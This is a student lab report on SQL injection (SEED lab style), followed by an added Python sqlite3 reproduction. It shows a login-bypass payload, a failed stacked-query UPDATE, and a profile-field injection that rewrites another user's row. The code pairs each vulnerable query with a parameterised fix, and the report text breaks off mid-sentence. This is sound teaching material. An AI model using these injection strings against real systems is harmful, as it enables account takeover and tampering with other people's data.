Yukui Ye
SUID: 439644268
Task1: SQL Injection Attack on SELECT Statements
Setup: Turn off the built-in SQL injection protection
Set magic_quotes_gpc = Off in /etc/php5/apache2/php.ini. This disables PHP's automatic backslash-escaping of quotes in GET/POST/cookie input, which would otherwise neutralise the single quotes in our payloads.
Then restart Apache so the change takes effect:
Task1.1: Log into another person’s account without knowing the password
Check the login code to see how the login works.
The following PHP code runs on the server side.
From the above code we can see how the server builds the query and sends it to the database. Even without knowing the password, we can log in as bob by typing bob');--  (with a space after the -- comment marker) in the user-name field. The closing quote and parenthesis terminate the name condition, and the comment discards the rest of the statement, including the password check. The trailing space matters: MySQL only treats -- as a comment when it is followed by whitespace.
With this input we are logged into bob's account.
Task1.2: Find a way to modify the database.
We can use a semicolon to end the SQL statement and append an UPDATE, INSERT or DELETE statement right after it, so that the database receives two statements at once (a stacked query). I tried the following in the login window:
peter');update user set company='SQLinjection' where id=4;--
The attempt failed, as the screenshot below shows.
REASON: Check the PHP code again:
The code uses mysql_query() to send the statement to the database. mysql_query() sends exactly one statement per call; stacked statements are not supported, so the injected UPDATE cannot be run in the same call as the login SELECT. (Other MySQL APIs, such as mysqli_multi_query(), do accept stacked statements, so this limitation is a property of the API rather than a defence.)
Task2: SQL Injection on UPDATE Statements
Step1: The idea is the same as in Task1: use -- to comment out the rest of the statement and supply our own WHERE condition. First, we log in as peter (whose profile is initially empty), change the user name to bob, and enter SU' where ID=3;--  in the company field, together with values for email and phone number. The injected closing quote ends the company value, our WHERE clause targets bob's row (ID 3), and the comment discards the remainder of the original statement, including its own WHERE clause, so the update is applied to bob's row instead of peter's.
After we click the Send button and open peter's profile, it is still empty, as before.
Then we log in as bob to check bob's profile, we
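The following is an added example that reproduces the three experiments of this report (Task1.1, Task1.2 and Task2) against an in-memory SQLite database using Python's sqlite3 module. It is not the lab's PHP code: the table layout, the ids of alice (4) and peter (5), and the exact shape of the two vulnerable statements are assumptions modelled on the report (bob's id 3 follows the report). sqlite3's execute() applies the same one-statement-per-call rule as mysql_query(), so the Task1.2 failure reproduces as well, and each vulnerable statement is paired with a parameterised version that shows the fix.

```python
# Added example, not part of the lab report or the SEED lab's PHP code.
import sqlite3

# Older CPython releases raise sqlite3.Warning for stacked statements,
# newer ones raise sqlite3.ProgrammingError; accept both.
MULTI_STATEMENT_ERRORS = (sqlite3.Warning, sqlite3.ProgrammingError)


def make_db() -> sqlite3.Connection:
    """Constructed sample data. The table layout and the ids of alice (4)
    and peter (5) are assumptions; bob's id 3 follows the report."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, pass TEXT, "
        "company TEXT, email TEXT, phone TEXT)"
    )
    db.executemany("INSERT INTO user VALUES (?, ?, ?, ?, ?, ?)", [
        (3, "bob", "bobpw", "", "", ""),
        (4, "alice", "alicepw", "", "", ""),
        (5, "peter", "peterpw", "", "", ""),
    ])
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Task1.1: login query built by string splicing (assumed shape of the
    lab's SELECT; the parenthesised WHERE is why the payload carries a ')')."""
    sql = (f"SELECT id, name FROM user WHERE (name='{username}' "
           f"AND pass='{password}')")
    row = db.execute(sql).fetchone()
    return row[1] if row else None


def login_safe(db, username, password):
    """Same query with placeholders: the payload is bound as a literal user
    name and no longer matches anyone."""
    row = db.execute("SELECT id, name FROM user WHERE name=? AND pass=?",
                     (username, password)).fetchone()
    return row[1] if row else None


def stacked_update_attempt(db):
    """Task1.2: append an UPDATE after the SELECT. Returns (error message or
    None, company of id 4 afterwards). Like mysql_query(), sqlite3's execute()
    runs one statement per call, so the stacked UPDATE is rejected unrun."""
    payload = "peter');update user set company='SQLinjection' where id=4;-- "
    try:
        login_vulnerable(db, payload, "anything")
        error = None
    except MULTI_STATEMENT_ERRORS as exc:
        error = str(exc)
    company = db.execute("SELECT company FROM user WHERE id=4").fetchone()[0]
    return error, company


def update_profile_vulnerable(db, user_id, name, company, email, phone):
    """Task2: profile UPDATE built by splicing (assumed shape). Only the id
    comes from the session; every other field is attacker-controlled."""
    sql = (f"UPDATE user SET name='{name}', company='{company}', "
           f"email='{email}', phone='{phone}' WHERE id={user_id}")
    db.execute(sql)
    db.commit()


def update_profile_safe(db, user_id, name, company, email, phone):
    """Parameterised UPDATE: the payload is stored verbatim as the company."""
    db.execute("UPDATE user SET name=?, company=?, email=?, phone=? WHERE id=?",
               (name, company, email, phone, user_id))
    db.commit()


PROFILE_PAYLOAD = "SU' where ID=3;-- "   # the report's company-field payload


def profile_rows(db):
    """(name, company) of bob (id 3) and peter (id 5), for inspection."""
    bob = db.execute("SELECT name, company FROM user WHERE id=3").fetchone()
    peter = db.execute("SELECT name, company FROM user WHERE id=5").fetchone()
    return bob, peter


def task2_hijack(db, update=update_profile_vulnerable):
    """Logged in as peter (id 5), submit the report's payload in the company
    field. With the vulnerable UPDATE the injected WHERE redirects the write
    to bob's row and the comment drops 'WHERE id=5'; with the safe one the
    payload is stored as data in peter's own row."""
    update(db, 5, "bob", PROFILE_PAYLOAD, "bob@example.com", "123")
    return profile_rows(db)


if __name__ == "__main__":
    db = make_db()
    print("Task1.1 vulnerable:", login_vulnerable(db, "bob');-- ", "wrong"))
    print("Task1.1 safe:      ", login_safe(db, "bob');-- ", "wrong"))
    print("Task1.2 stacked:   ", stacked_update_attempt(db))
    print("Task2 vulnerable:  ", task2_hijack(db))
    print("Task2 safe:        ", task2_hijack(make_db(), update_profile_safe))
```

Running the file prints the five results: the vulnerable login returns bob for the payload and a wrong password, the safe login returns nothing, the stacked UPDATE raises the one-statement error and leaves alice's company untouched, and the profile payload rewrites bob's row (id 3) while peter's stays empty. With the parameterised UPDATE the same payload ends up as peter's literal company string. Note that the Task1.2 failure depends on the API, not on any defence: executescript() here, or mysqli_multi_query() in PHP, would have run the injected UPDATE.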